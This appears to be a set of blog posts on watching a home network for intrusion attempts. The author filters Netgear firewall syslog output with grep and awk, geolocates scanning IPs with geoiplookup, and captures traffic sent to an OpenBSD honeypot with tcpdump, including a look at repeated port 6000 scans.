May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46169]:portforward forwarded , SIP:76.96.30.119: 110, DIP:98.247.182.78: 17681,

I can get an excellent approximation of those IPs whose port attempts simply can be easily counted as part of any possibly normal connectivity by subtracting (as above in the tcpdump filters) those SIP ports that are not mail, whois, dns, http, ntp, etc. :

grep -f file1 syslog | grep -v -f file2 | awk -F":" '{print $5}' | sort | uniq >> out.txt

where file1 is:

Hacker

Blocked

and file2 is:

25,

43,

53,

80,

110,

123,

587,

As the astute reader will point, this technique completely neglects hacking attacks from legitimate ports! And also much legitimate traffic comes over port 443 (ssl) which I have excluded here.(Of course, that is what an IDS is for... Much more on that later...) The next step in my investigation is lookup the country of origin for the IP. Batching whois queries are frowned upon. GeoIPLookup fills this need:

for i in `cat out.txt`; do echo $i:`geoiplookup $i`;done;          

10.13.3.61:GeoIP Country Edition: IP Address not found

113.56.251.166:GeoIP Country Edition: CN, China

115.132.83.188:GeoIP Country Edition: MY, Malaysia

116.3.98.197:GeoIP Country Edition: CN, China

116.54.196.108:GeoIP Country Edition: CN, China

117.127.93.18:GeoIP Country Edition: CN, China

118.100.85.190:GeoIP Country Edition: MY, Malaysia

118.22.208.254:GeoIP Country Edition: JP, Japan

....

Hacking is an international activity. It is nice to be silently stalked by so many foreign countries!

for i in `cat out.txt`; do geoiplookup $i >> geoiplookup.txt ;done;

cat geoiplookup.txt | sort | uniq -c | sort -r

  55 GeoIP Country Edition: CN, China

  20 GeoIP Country Edition: US, United States

  10 GeoIP Country Edition: RU, Russian Federation

  10 GeoIP Country Edition: BR, Brazil

   8 GeoIP Country Edition: UA, Ukraine

   5 GeoIP Country Edition: VN, Vietnam

   4 GeoIP Country Edition: MY, Malaysia

   4 GeoIP Country Edition: KR, Korea, Republic of

   4 GeoIP Country Edition: IT, Italy

   3 GeoIP Country Edition: FR, France

   2 GeoIP Country Edition: TR, Turkey

   2 GeoIP Country Edition: JP, Japan

   2 GeoIP Country Edition: GB, United Kingdom

   2 GeoIP Country Edition: DE, Germany

   2 GeoIP Country Edition: CA, Canada

   1 GeoIP Country Edition: ZA, South Africa

   1 GeoIP Country Edition: VE, Venezuela

   1 GeoIP Country Edition: UY, Uruguay

   1 GeoIP Country Edition: TW, Taiwan

   1 GeoIP Country Edition: TH, Thailand

   1 GeoIP Country Edition: SI, Slovenia

   1 GeoIP Country Edition: SE, Sweden

   1 GeoIP Country Edition: QA, Qatar

   1 GeoIP Country Edition: PL, Poland

   1 GeoIP Country Edition: PH, Philippines

   1 GeoIP Country Edition: PA, Panama

   1 GeoIP Country Edition: NZ, New Zealand

   1 GeoIP Country Edition: NO, Norway

   1 GeoIP Country Edition: MX, Mexico

   1 GeoIP Country Edition: MD, Moldova, Republic of

   1 GeoIP Country Edition: JM, Jamaica

   1 GeoIP Country Edition: IP Address not found

   1 GeoIP Country Edition: IN, India

   1 GeoIP Country Edition: HK, Hong Kong

   1 GeoIP Country Edition: FI, Finland

   1 GeoIP Country Edition: EG, Egypt

   1 GeoIP Country Edition: CO, Colombia

What of "IP Address not found"!? (Another question to resolve..) However, let us suppose we are just interested the U.S. connections. Keep in mind some of these are legitimate ssl (443) connections.

# for i in `cat out.txt`; do echo $i:` geoiplookup $i` | grep "United States";done; 

152.26.20.72:GeoIP Country Edition: US, United States

168.75.65.98:GeoIP Country Edition: US, United States

173.1.171.82:GeoIP Country Edition: US, United States

173.69.171.116:GeoIP Country Edition: US, United States

173.8.113.195:GeoIP Country Edition: US, United States

205.214.57.202:GeoIP Country Edition: US, United States

208.111.159.155:GeoIP Country Edition: US, United States

209.85.201.125:GeoIP Country Edition: US, United States

63.226.235.106:GeoIP Country Edition: US, United States

63.231.190.174:GeoIP Country Edition: US, United States

64.251.8.230:GeoIP Country Edition: US, United States

66.35.46.195:GeoIP Country Edition: US, United States

68.142.94.151:GeoIP Country Edition: US, United States

68.37.225.206:GeoIP Country Edition: US, United States

72.42.151.135:GeoIP Country Edition: US, United States

74.63.193.230:GeoIP Country Edition: US, United States

98.220.41.92:GeoIP Country Edition: US, United States

98.247.182.78:GeoIP Country Edition: US, United States

98.247.212.4:GeoIP Country Edition: US, United States

99.152.215.137:GeoIP Country Edition: US, United States

It is useful to see how much information can be gained without packet inspection. next up...tracking SIPs to their networks...

Port 6000 Scans

I receive lots of 6000 port scans on my Netgear FVS318 Firewall. My guess is many of you do as well. In changing the Firewall to forward all the ports to an OpenBSD "dummy/honeypot" host, I am able to sniff the packets that come into my WAN (without a tap), thus increasing my information/control over them vs. Firewall syslog output. X11 can be configured with default remote port on 6000.  My guess is I receive a two dozen plus IPs attempting to connect with this port per week:

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on xl0, link-type EN10MB (Ethernet), capture size 65535 bytes

...

1241648685.844326 IP 218.58.220.130.6000 > 192.168.0.12.2967: Flags [S], seq 1519714304, win 16384, length 0

1241649491.716071 IP 80.13.217.205.6000 > 192.168.0.12.2967: Flags [S], seq 1519714304, win 16384, options [mss 1460], length 0

....

1241653701.125407 IP 221.195.73.68.6000 > 192.168.0.12.7212: Flags [S], seq 1454440448, win 16384, length 0

1241653701.128528 IP 221.195.73.68.6000 > 192.168.0.12.8000: Flags [S], seq 798031872, win 16384, length 0

1241656783.765870 IP 119.161.130.75.6000 > 192.168.0.12.2967: Flags [S], seq 640548864, win 16384, length 0

....

/var/log# grep 119.161.130.75  syslog

[Under FVS318 normal operation]:

May  4 10:45:13 192.168.0.1 rferris [59299]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  4 12:43:54 192.168.0.1 rferris [59342]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  4 17:36:29 192.168.0.1 rferris [59440]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  4 22:28:39 192.168.0.1 rferris [59534]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  5 03:52:54 192.168.0.1 rferris [62240]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  5 09:05:59 192.168.0.1 rferris [64532]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  5 09:05:59 192.168.0.1 rferris Hacker Log[64533]:PROTO_TCP, SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, Suspicious TCP Data

May  5 14:36:22 192.168.0.1 rferris [64635]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  5 19:34:38 192.168.0.1 rferris [64831]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  6 00:34:49 192.168.0.1 rferris [70599]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  6 05:22:39 192.168.0.1 rferris [73607]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  6 10:11:50 192.168.0.1 rferris [76793]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  6 14:11:41 192.168.0.1 rferris [76868]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

[With dummy/honeypot host] FVS318 performs as such

May  6 20:15:15 192.168.0.1 rferris [216]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  6 20:15:15 192.168.0.1 rferris Blocked Sites Log[217]:portforward forwarded , SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, 

May  7 01:04:14 192.168.0.1 rferris [5964]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  7 01:04:14 192.168.0.1 rferris Blocked Sites Log[5965]:portforward forwarded , SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, 

May  7 05:57:33 192.168.0.1 rferris [10106]:TCP(2967)                 Dest IP :98.247.182.78,         Src IP  :119.161.130.75

May  7 05:57:33 192.168.0.1 rferris Blocked Sites Log[10107]:portforward forwarded , SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, 

The Dummy Host....

Another option besides taps or hubs for sniffing traffic from your WAN port is to set up your firewall to port forward all traffic (Ports 1 - 65535) to a 'dummy' or 'honeypot' box on your network running no insecure services. (OpenBSD with a fully commented out inetd.conf file  is a good choice for this...maybe with pfsense running:-)  Tcpdump 4.0 can then catch the traffic the Firewall (e.g. logs forwarded to syslogd) missed. You will want to filter out quite a bit of traffic. You can see BSD sending length 0 packets back to strange port requests below. I would like to know what all the Port 6000 requests are about.

 

/usr/local/sbin/tcpdump -s 0 -i dc0 -n host [dummy/honeynet host IP] and 'port not(65533 or domain or whois or http or https or ntp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)'

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on dc0, link-type EN10MB (Ethernet), capture size 65535 bytes

IP 98.247.182.78.18495 > 192.168.0.6.6000: Flags [S], seq 363174240, win 5840, options [mss 1460,sackOK,TS val 2475642 ecr 0,nop,wscale 5], length 0

IP 192.168.0.6.6000 > 98.247.182.78.18495: Flags [R.], seq 0, ack 363174241, win 0, length 0

IP 211.99.122.18.1870 > 192.168.0.6.1434: UDP, length 376

IP 217.116.58.35.4073 > 192.168.0.6.23: Flags [S], seq 2731026689, win 5840, options [mss 1460,sackOK,TS val 63933632 ecr 0,nop,wscale 0], length 0

IP 192.168.0.6.23 > 217.116.58.35.4073: Flags [R.], seq 0, ack 2731026690, win 0, length 0

IP 79.21.157.80.2166 > 192.168.0.6.6429: Flags [S], seq 474425300, win 65535, options [mss 1452,nop,nop,sackOK], length 0

IP 192.168.0.6.6429 > 79.21.157.80.2166: Flags [R.], seq 0, ack 474425301, win 0, length 0

IP 79.21.157.80.2166 > 192.168.0.6.6429: Flags [S], seq 474425300, win 65535, options [mss 1452,nop,nop,sackOK], length 0

IP 192.168.0.6.6429 > 79.21.157.80.2166: Flags [R.], seq 0, ack 1, win 0, length 0

IP 79.21.157.80.2166 > 192.168.0.6.6429: Flags [S], seq 474425300, win 65535, options [mss 1452,nop,nop,sackOK], length 0

IP 192.168.0.6.6429 > 79.21.157.80.2166: Flags [R.], seq 0, ack 1, win 0, length 0

The syslog command to compared this output with is:

tail  -n 10000 -f syslog | grep -i -f file1 | grep -v -f file2

Where file1 is:

Hacker

Blocked

Where file2 is :

25,

53,

80,

43,

587,

110,

Normally, the Netgear FVS318 gives us "Hacker Log" when its signature detection catches an abnormal packet:

May  6 10:11:31 192.168.0.1 rferris Hacker Log[76792]:PROTO_TCP, SIP:85.99.72.200: 4784, DIP:98.247.182.78: 23, Telnet

May  6 12:08:20 192.168.0.1 rferris Hacker Log[76826]:PROTO_TCP, SIP:99.152.215.137: 2766, DIP:98.247.182.78: 18448, Suspicious TCP Data

May  6 12:35:03 192.168.0.1 rferris Hacker Log[76832]:PROTO_TCP, SIP:118.100.85.190: 4323, DIP:98.247.182.78: 6429, Suspicious TCP Data

May  6 13:34:12 192.168.0.1 rferris Hacker Log[76849]:PROTO_UDP, SIP:87.17.219.154: 1615, DIP:98.247.182.78: 12712, Suspicious UDP Data

May  6 13:55:10 192.168.0.1 rferris Hacker Log[76859]:PROTO_TCP, SIP:222.150.209.191: 3640, DIP:98.247.182.78: 5554, Suspicious TCP Data

May  6 14:13:50 192.168.0.1 rferris Hacker Log[76870]:PROTO_TCP, SIP:64.251.8.230: 6000, DIP:98.247.182.78: 2967, Suspicious TCP Data

May  6 16:28:56 192.168.0.1 rferris Hacker Log[76905]:PROTO_TCP, SIP:83.23.92.208: 2136, DIP:98.247.182.78: 23, Telnet

May  6 16:35:45 192.168.0.1 rferris Hacker Log[76907]:PROTO_UDP, SIP:220.180.133.13: 19672, DIP:98.247.182.78: 1434, Suspicious UDP Data

May  6 17:02:14 192.168.0.1 rferris Hacker Log[76916]:PROTO_UDP, SIP:89.169.90.18: 1685, DIP:98.247.182.78: 12712, Suspicious UDP Data

May  6 17:16:17 192.168.0.1 rferris Hacker Log[76922]:PROTO_TCP, SIP:125.113.14.183: 1810, DIP:98.247.182.78: 6429, Suspicious TCP Data

May  6 18:13:17 192.168.0.1 rferris Hacker Log[76938]:PROTO_UDP, SIP:118.22.208.254: 1134, DIP:98.247.182.78: 38507, Suspicious UDP Data

May  6 19:21:08 192.168.0.1 rferris Hacker Log[78279]:PROTO_UDP, SIP:117.127.93.18: 1377, DIP:98.247.182.78: 12712, Suspicious UDP Data

May  6 19:23:21 192.168.0.1 rferris Hacker Log[78289]:PROTO_UDP, SIP:119.203.56.20: 1084, DIP:98.247.182.78: 38507, Suspicious UDP Data

However, if you configure all ports to forward to your "dummy/honeypot" server, you trigger the block sites log for all activity. Here we have subtracted functioning ports the firewall (25,53,80,110,43,587,)normally nats out...Of course, that is another story....

May  6 19:39:10 192.168.0.1 rferris Blocked Sites Log[9]:portforward forwarded , SIP:12.151.34.170: 123, DIP:98.247.182.78: 16896, 

May  6 19:39:59 192.168.0.1 rferris Blocked Sites Log[16]:portforward forwarded , SIP:209.85.201.125: 5223, DIP:98.247.182.78: 17919, 

May  6 20:00:28 192.168.0.1 rferris Blocked Sites Log[130]:portforward forwarded , SIP:60.18.161.7: 6000, DIP:98.247.182.78: 1433, 

May  6 20:15:15 192.168.0.1 rferris Blocked Sites Log[217]:portforward forwarded , SIP:119.161.130.75: 6000, DIP:98.247.182.78: 2967, 

May  6 20:26:48 192.168.0.1 rferris Blocked Sites Log[250]:portforward forwarded , SIP:221.195.73.68: 6000, DIP:98.247.182.78: 7212, 

May  6 20:44:57 192.168.0.1 rferris Blocked Sites Log[326]:portforward forwarded , SIP:221.208.253.254: 6000, DIP:98.247.182.78: 2967, 

May  6 21:14:25 192.168.0.1 rferris Blocked Sites Log[653]:portforward forwarded , SIP:98.247.182.78: 113, DIP:98.247.182.78: 18932, 

May  6 21:14:28 192.168.0.1 rferris Blocked Sites Log[940]:portforward forwarded , SIP:98.247.182.78: 37, DIP:98.247.182.78: 18649, 

May  6 21:16:22 192.168.0.1 rferris Blocked Sites Log[3017]:portforward forwarded , SIP:98.247.182.78: 13, DIP:98.247.182.78: 18487, 

May  6 21:16:39 192.168.0.1 rferris Blocked Sites Log[3019]:portforward forwarded , SIP:98.247.182.78: 113, DIP:98.247.182.78: 18488, 

May  6 21:35:43 192.168.0.1 rferris Blocked Sites Log[3115]:portforward forwarded , SIP:211.99.122.18: 1870, DIP:98.247.182.78: 1434, 

May  6 21:36:41 192.168.0.1 rferris Blocked Sites Log[3117]:portforward forwarded , SIP:217.116.58.35: 4073, DIP:98.247.182.78: 23, 

May  6 21:39:19 192.168.0.1 rferris Blocked Sites Log[3126]:portforward forwarded , SIP:12.151.34.170: 123, DIP:98.247.182.78: 16896, 

May  6 22:05:18 192.168.0.1 rferris Blocked Sites Log[3258]:portforward forwarded , SIP:79.21.157.80: 2166, DIP:98.247.182.78: 6429, 

May  6 22:07:11 192.168.0.1 rferris Blocked Sites Log[3266]:portforward forwarded , SIP:218.75.95.242: 6000, DIP:98.247.182.78: 2967, 

May  6 22:14:26 192.168.0.1 rferris Blocked Sites Log[3636]:portforward forwarded , SIP:66.35.46.195: 10683, DIP:98.247.182.78: 33436, 

May  6 22:20:22 192.168.0.1 rferris Blocked Sites Log[4019]:portforward forwarded , SIP:66.35.46.195: 11923, DIP:98.247.182.78: 33436, 

May  6 22:29:20 192.168.0.1 rferris Blocked Sites Log[4302]:portforward forwarded , SIP:66.35.46.195: 11888, DIP:98.247.182.78: 33436, 

May  6 23:01:35 192.168.0.1 rferris Blocked Sites Log[4470]:portforward forwarded , SIP:202.99.11.99: 1231, DIP:98.247.182.78: 1434, 

May  6 23:03:49 192.168.0.1 rferris Blocked Sites Log[4514]:portforward forwarded , SIP:217.128.72.145: 1393, DIP:98.247.182.78: 38507, 

Monitoring home networks with bare bones

Network monitoring and intrusion detection are done at many different levels now: individual computer, home networks, small networks, larger networks, ISP backbones. There are literally network taps, network prefilters, firewalls, contextual search engines and intrusion detection systems, analyzers for every budget and bandwidth. But still, ghostnets happen , even in supposedly secure locations.  Simply put, current attack vectors outfox existing security installations! But without hashing over all the existing technologies, checking out your network at a raw level looks something like this:

Your primitive tools are Cygwin, tcpdump4.0 , Snort, NM 3.3, syslogd, bash shell, pcregrep, a hub, an updated router/firewall, XWindows running on one or more of Linux, OpenBSD, or Windows XP. Your assignment is to redirect the traffic coming to your external router to a "tap" (or in this cheapest case a hub) and monitor it for unwarranted traffic and attempted intrusions.  If you have a reliable hardware firewall, it will output messages of your choosing to a correctly configured syslogd that accepts remote connections:

grep rferris syslog

May  5 01:49:04 192.168.0.1 rferris [61282]:TCP(19590)                 Dest IP :98.247.182.78,         Src IP  :85.13.200.108

May  5 01:49:04 192.168.0.1 rferris [61283]:HTTP(80)                 Dest IP :74.125.127.191,         Src IP  :192.168.0.8

May  5 01:49:04 192.168.0.1 rferris [61284]:TCP(19591)                 Dest IP :98.247.182.78,         Src IP  :74.125.127.191

May  5 01:50:21 192.168.0.1 rferris [61285]:TCP(19591)                 Dest IP :98.247.182.78,         Src IP  :74.125.127.191

May  5 01:50:29 192.168.0.1 rferris [61286]:HTTP(80)                 Dest IP :74.125.127.191,         Src IP  :192.168.0.8

May  5 01:50:29 192.168.0.1 rferris [61287]:TCP(19609)                 Dest IP :98.247.182.78,         Src IP  :74.125.127.191

May  5 01:51:29 192.168.0.1 rferris [61288]:TCP(19609)                 Dest IP :98.247.182.78,         Src IP  :74.125.127.191

May  5 01:52:06 192.168.0.1 rferris [61289]:POP3(110)                 Dest IP :76.96.30.119,         Src IP  :192.168.0.9

May  5 01:52:06 192.168.0.1 rferris [61290]:TCP(20129)                 Dest IP :98.247.182.78,         Src IP  :76.96.30.119

May  5 01:53:06 192.168.0.1 rferris [61291]:TCP(20129)                 Dest IP :98.247.182.78,         Src IP  :76.96.30.119

 grep -i hacker syslog 

May  4 08:22:13 192.168.0.1 rferris Hacker Log[58760]:PROTO_TCP, SIP:61.164.116.52: 6000, DIP:98.247.182.78: 2967, Suspicious TCP Data

May  4 09:08:00 192.168.0.1 rferris Hacker Log[59132]:PROTO_UDP, SIP:84.237.112.4: 1046, DIP:98.247.182.78: 38507, Suspicious UDP Data

May  4 10:23:27 192.168.0.1 rferris Hacker Log[59292]:PROTO_TCP, SIP:123.10.44.80: 2205, DIP:98.247.182.78: 18448, Suspicious TCP Data

May  4 10:32:33 192.168.0.1 rferris Hacker Log[59294]:PROTO_TCP, SIP:121.14.152.130: 6000, DIP:98.247.182.78: 1433, Suspicious TCP Data

May  4 10:44:45 192.168.0.1 rferris Hacker Log[59298]:PROTO_UDP, SIP:173.8.113.195: 3193, DIP:98.247.182.78: 1434, Suspicious UDP Data

May  4 10:47:32 192.168.0.1 rferris Hacker Log[59300]:PROTO_UDP, SIP:93.5.92.78: 1137, DIP:98.247.182.78: 12712, Suspicious UDP Data

But firewalls don't catch and catalog all the packets, So you will need to filter and trap them, perhaps with  tcpdump  set of filters like so:

/usr/local/sbin/tcpdump -ntttvvveXX -i xl0 -s 65535 host [your leased IP] and not arp or icmp or igmp and 'port not (bootpc or domain or pop3 or whois or http or https)' and  'host not (wf-in-f125.google.com or cns.beaverton.or.bverton.comcast.net or 73.98.100.1)' >> `date "+%b%e%H%M%S%Z%Y"`

And after you have captured your filtered traffic, you may need more filtering to extract a list of IPs:

grep seq May\ 3115119PDT2009 | grep -v -f file | awk -F ">" '{print $1}' | more

$ more file

DHCP

ICMP

POP3

DIP

Thus we have a literal boom in the network security business to make this type of data collection easier, more intuitive, more suitable for today's level of traffic: taps, filters, IDS/IPS devices, filtering Firewalls with IDS functionality, protocol analyzers, etc.  But at some point first before you deploy any of this, you are going to want to break ground and sit and watch traffic, so you viscerally understand the threats, attack vectors, sniffers and firewalls